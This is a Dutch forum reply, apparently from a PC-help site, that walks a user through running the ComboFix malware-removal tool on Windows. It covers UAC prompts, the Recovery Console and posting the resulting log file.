Schakel je antivirus- en antispywareprogramma's uit, mogelijk kunnen ze conflicteren met ComboFix.exe

(hier of hier) kan je lezen hoe je de gebruikte beveiligingssoftware kunt uitschakelen.

  • Dubbelklik op "ComboFix" om de tool te starten, Windows Vista, 7 & 8 gebruikers zullen een melding krijgen van UAC (Gebruikersaccountbeheer), klik hier op Ja / yes.
  • Op een Windows XP computer zal ComboFix de "Recovery Console" installeren als deze nog niet aanwezig is. (Een actieve internet verbinding is dan een vereiste).
  • Klik in het venster bij het 'Installeren van de Recovery Console' op "Ok".
  • Klik in het info scherm op "Ja" als de Recovery Console met succes is geïnstalleerd.
  • Klik in het scherm van de disclaimer op "I Agree", de benodigde onderdelen worden nu uitgepakt en middels ERUNT wordt er een register back-up gemaakt.
  • Wanneer dit gereed is zal ComboFix vanzelf starten, in het blauwe scherm ziet u de voortgang van de systeemscan die wordt uitgevoerd.
  • Belangrijk! gebruik de computer tijdens de scan niet voor andere zaken.
  • Het kan voorkomen dat de computer meerdere malen opnieuw gestart moet worden zoals bijvoorbeeld bij de aanwezigheid van een rootkit, dit is normaal.
  • Wanneer ComboFix gereed is, zal het een logbestand aanmaken. Post de inhoud van dit logbestand (te vinden als C:\ComboFix.txt) in je volgende bericht.

* Noot !!! Indien u één van de onderstaande meldingen krijgt na het gebruik van ComboFix herstart dan de computer.

  • Er is geprobeerd een ongeldige bewerking uit te voeren op een registersleutel die is gemarkeerd voor verwijdering.
  • Illegal operation attempted on a registry key that has been marked for deletion.

Link naar reactie
Delen op andere sites


×
×
  • Nieuwe aanmaken...

Belangrijke informatie

We hebben cookies geplaatst op je toestel om deze website voor jou beter te kunnen maken. Je kunt de cookie instellingen aanpassen, anders gaan we er van uit dat het goed is om verder te gaan.